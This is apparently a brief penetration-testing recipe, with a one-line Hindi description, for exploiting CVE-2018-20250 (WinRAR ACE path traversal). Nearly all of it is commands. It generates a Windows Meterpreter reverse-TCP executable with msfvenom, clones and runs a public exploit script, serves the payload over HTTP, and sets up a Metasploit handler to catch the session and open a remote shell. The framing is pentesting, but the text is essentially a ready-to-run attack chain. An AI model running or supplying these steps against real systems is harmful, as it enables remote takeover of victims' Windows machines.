
CVE-2018-20250 (WinRAR ACE पथ ट्रैवर्सल) के लिए शोषण स्क्रिप्ट, पैठ परीक्षण के लिए एकीकृत Metasploit पेलोड जनरेशन और रिवर्स शेल डिलीवरी के साथ।
ip a
msfvenom -p windows/meterpreter/reverse_tcp lport=1234 lhost=10.0.0.199 -f exe > shell.exe
git clone https://github.com/LamSonBinh/CVE-2018-20250
py exp.py
python3 -m http.server
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 1234
set lhost 10.0.0.199
exploit -j
sessions
sessions 1
sysinfo
shell